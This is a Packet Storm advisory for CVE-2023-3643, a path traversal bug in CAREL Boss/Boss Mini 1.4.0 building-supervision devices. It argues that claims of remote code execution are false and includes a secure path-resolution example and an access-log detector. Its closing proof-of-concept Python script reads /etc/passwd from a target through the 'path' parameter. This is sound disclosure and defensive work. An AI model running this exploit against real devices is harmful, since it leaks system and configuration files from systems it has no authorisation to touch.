📄 CAREL Boss / Boss Mini 1.4.0 Path Traversal

Published: 26 Nov 2025 00:00:00 | Reported by: indoushka | Type: packetstorm | Source: packetstorm.news | 134 views

Carel Boss and Boss Mini 1.4.0 suffer LFI allowing remote data disclosure; no RCE.

Related

| Family | Title | Published |
|---|---|---|
| 0day.today (zdt) | Boss Mini 1.4.0 - local file inclusion Exploit | 4 Mar 2024 00:00 |
| Circl | CVE-2023-3643 | 12 Jul 2023 22:25 |
| CNNVD | Carel Boss Mini security vulnerability ("Carel Boss Mini 安全漏洞") | 12 Jul 2023 00:00 |
| CVE | CVE-2023-3643 | 12 Jul 2023 17:31 |
| Cvelist | CVE-2023-3643 Boss Mini document file inclusion | 12 Jul 2023 17:31 |
| Exploit DB | Boss Mini 1.4.0 - local file inclusion | 3 Mar 2024 00:00 |
| Exploit DB | Boss Mini v1.4.0 - Local File Inclusion (LFI) | 3 Mar 2026 00:00 |
| EUVD | EUVD-2023-44287 | 12 Jul 2023 17:31 |
| ICS | CAREL Boss-Mini | 20 Jun 2024 06:00 |
| Nuclei | CAREL Boss Mini <= 1.4.0 - Local File Inclusion | 3 Jun 2026 06:04 |
=============================================================================================================================================
    | # Title     : Boss Mini 1.4.0 path traversal                                                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.carel.com/product/boss                                                                                          |
    =============================================================================================================================================
    
    1. Summary
    -----------
    
    A vulnerability has been identified in CAREL Boss and Boss Mini
    supervision devices running version 1.4.0. The weakness allows
    remote unauthenticated users to disclose sensitive information
    through a path traversal (Local File Inclusion, LFI) vector in the
    "path" parameter, caused by improper input validation.
    
    Importantly, this vulnerability does NOT provide any form of RCE.
    
    2. References
    --------------
    
    Based on the public advisory published on Packet Storm
    
    (https://packetstorm.news/files/id/177394/)
    
    and the official CVE entry for **CVE-2023-3643**,
    
    combined with a full technical analysis of the exploitation flow, it has been
    conclusively confirmed that the widely circulated "Boss Mini 1.4.0 LFI
    Log Poisoning" exploit is **fake, impossible, and non-functional**.
    
    The device does not run PHP, does not support log-based code execution,
    and the vulnerable endpoint does not allow any code interpretation: the
    file read back through "path" is returned as data, never evaluated.
    Log poisoning only turns a file read into code execution when the
    included file is handed to a script interpreter (for example PHP's
    include()); with no such interpreter behind the endpoint, the poisoned
    log has nothing to execute it.
    Therefore, any exploit claiming **LFI → Log Poisoning → RCE** is
    **technically impossible and must be considered false**.
    
    --------------------------------------------------------------------
    
    3. Affected Products
    ---------------------
    - CAREL Boss Mini 1.4.0
    - CAREL Boss 1.4.0
    - Possibly earlier versions exposing the same document endpoint
      (unconfirmed; the Nuclei template listed above targets <= 1.4.0)
    
    --------------------------------------------------------------------
    
    4. Vulnerability Details
    -------------------------
    The vulnerable parameter **path** fails to sanitize directory traversal
    patterns, allowing attackers to read arbitrary files accessible by the
    web process.
    
    Example vulnerable pattern: /boss/document?path=../../../../etc/passwd
    
    This grants information disclosure but **cannot** escalate to RCE because
    the appliance lacks PHP or any script execution engine.
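
    The traversal described above, as an added example that is not part of the
    advisory or CAREL's code: a naive join that reproduces the escape, beside a
    realpath-based containment check that rejects it, including the
    percent-encoded and backslash variants. DOC_ROOT, resolve_unsafe() and
    resolve_safe() are hypothetical names; only the endpoint shape
    /boss/document?path=... comes from the advisory, and whether the appliance
    percent-decodes the parameter before using it is an assumption.

```python
#!/usr/bin/env python3
"""Why '../' in a 'path' parameter escapes the document root, and the
containment check that stops it.

Added example, not CAREL's code. DOC_ROOT and the function names are
hypothetical; only the endpoint shape /boss/document?path=... comes from
the advisory. Whether the appliance percent-decodes the parameter before
using it is not stated on the page and is assumed here.
"""
import os
from typing import Optional
from urllib.parse import unquote

DOC_ROOT = "/opt/boss/documents"  # assumed location, illustrative only


def resolve_unsafe(doc_root: str, user_path: str) -> str:
    """What a vulnerable handler effectively does: decode, join, normalise.
    '..' segments walk straight out of doc_root."""
    return os.path.normpath(os.path.join(doc_root, unquote(user_path)))


def resolve_safe(doc_root: str, user_path: str) -> Optional[str]:
    """Return the resolved file path if it stays inside doc_root, else None."""
    decoded = unquote(user_path)
    # Backslashes count as separators on Windows hosts; normalise them so
    # '..\\..\\' cannot slip past a '../'-only check.
    decoded = decoded.replace("\\", "/")
    # NUL bytes and absolute paths have no business in a document lookup.
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, decoded))
    # commonpath() is the containment test. A startswith() check would let
    # '/opt/boss/documents-old' pass for a root of '/opt/boss/documents'.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for p in ("manuals/guide.pdf", "../../../../etc/passwd",
              "..%2f..%2f..%2f..%2fetc/passwd", "..\\..\\..\\..\\etc\\passwd"):
        print(f"{p!r:40} unsafe -> {resolve_unsafe(DOC_ROOT, p)}")
        print(f"{'':40} safe   -> {resolve_safe(DOC_ROOT, p)}")
```

    The check resolves symlinks before comparing, so a symlink planted inside
    the document directory cannot be used to point outside it either; a
    string-only normalisation would miss that case.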
    
    --------------------------------------------------------------------
    
    5. Impact
    ----------
    This vulnerability allows:
    - Reading system files
    - Accessing sensitive configuration data
    - Disclosure of internal JSON configuration structures
    
    This vulnerability **does NOT allow**:
    - Command execution  
    - Reverse shell  
    - Payload injection  
    - Any form of RCE  
    
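    For the detection side, an added example that is not from the advisory:
    it flags traversal attempts against /boss/document in combined-format
    access logs, including percent-encoded, double-encoded and backslash
    variants, and keeps the HTTP status so a 200 (the file was most likely
    served) can be triaged ahead of a 403 (blocked). The log lines are
    constructed for this example; addresses, timestamps and sizes are
    placeholders, and the log format is assumed.

```python
#!/usr/bin/env python3
"""Detection of CVE-2023-3643-style traversal attempts in access logs.

Added example, not from the advisory. The log lines below are constructed;
IPs, timestamps and sizes are placeholders. Assumes the Apache-style
combined log format and the endpoint shape /boss/document?path=... from
the advisory.
"""
import re
from typing import Dict, Iterator, List, Tuple
from urllib.parse import unquote, urlsplit

# Constructed sample: one benign fetch, three traversal attempts (plain,
# URL-encoded, double-encoded), and one unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Nov/2025:10:00:01 +0000] "GET /boss/document?path=manuals/guide.pdf HTTP/1.1" 200 5120
203.0.113.9 - - [26/Nov/2025:10:00:07 +0000] "GET /boss/document?path=../../../../etc/passwd HTTP/1.1" 200 1847
203.0.113.9 - - [26/Nov/2025:10:00:09 +0000] "GET /boss/document?path=..%2f..%2f..%2f..%2fetc%2fshadow HTTP/1.1" 403 213
203.0.113.9 - - [26/Nov/2025:10:00:11 +0000] "GET /boss/document?path=%252e%252e%252f%252e%252e%252fetc/passwd HTTP/1.1" 200 1847
198.51.100.2 - - [26/Nov/2025:10:00:15 +0000] "GET /boss/index.html HTTP/1.1" 200 980
"""

# Enough of the combined log format to get client, time, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A '..' path segment bounded by separators (or string start/end).
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')


def decode_param(raw: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times so double encoding is unmasked;
    backslashes are normalised to '/' so ..\\..\\ is caught as well."""
    for _ in range(rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw.replace("\\", "/")


def is_traversal(raw_value: str) -> bool:
    return TRAVERSAL_RE.search(decode_param(raw_value)) is not None


def raw_query_params(query: str) -> Iterator[Tuple[str, str]]:
    """Split the query string without decoding, so decoding stays under our control."""
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            yield key, value


def find_traversal_attempts(log_text: str) -> List[Dict[str, str]]:
    """One record per request to /boss/document whose 'path' carries a
    traversal sequence; 'status' lets a served 200 be triaged above a 403."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/boss/document":
            continue
        for key, raw in raw_query_params(parts.query):
            if key == "path" and is_traversal(raw):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": m.group("status"),
                    "path": decode_param(raw),
                })
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        served = "SERVED" if hit["status"] == "200" else "blocked"
        print(f'{hit["ts"]} {hit["ip"]} {hit["status"]} {served} path={hit["path"]}')
```

    Because the appliance returns the file as data, a 200 on one of these
    requests is the disclosure itself; there is no follow-on execution stage
    to hunt for, so the response size and the requested file are the useful
    pivots for scoping what was read.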
    --------------------------------------------------------------------
    
    6. Proof of Concept (PoC)
    -------------------------------
    ```python
    #!/usr/bin/env python3
    # CVE-2023-3643
    # Research: Indoushka
    #
    # Usage: python3 poc.py http://TARGET-IP
    # Requests /boss/document?path=../../../../etc/passwd and confirms the
    # response looks like a passwd file instead of trusting a bare HTTP 200
    # (an error page served with 200 would otherwise be reported as a hit).
    
    import sys
    import requests
    
    target = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "http://TARGET-IP"
    payload = "../../../../etc/passwd"
    
    # The traversal sequence is sent literally, without URL-encoding.
    url = f"{target}/boss/document?path={payload}"
    
    r = requests.get(url, timeout=10)
    
    if r.status_code == 200 and "root:" in r.text:
        print("[+] Vulnerable! File contents:")
        print(r.text)
    else:
        print(f"[-] Not vulnerable or patched (HTTP {r.status_code}).")
    ```
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================


Scores (Vulners, current as of 26 Nov 2025 00:00):
- Vulners AI Score: 7 (High risk)
- CVSS 3.1: 7.3 - 9.8
- CVSS 2: 7.5
- CVSS 3: 7.3
- EPSS: 0.35215
- Views: 134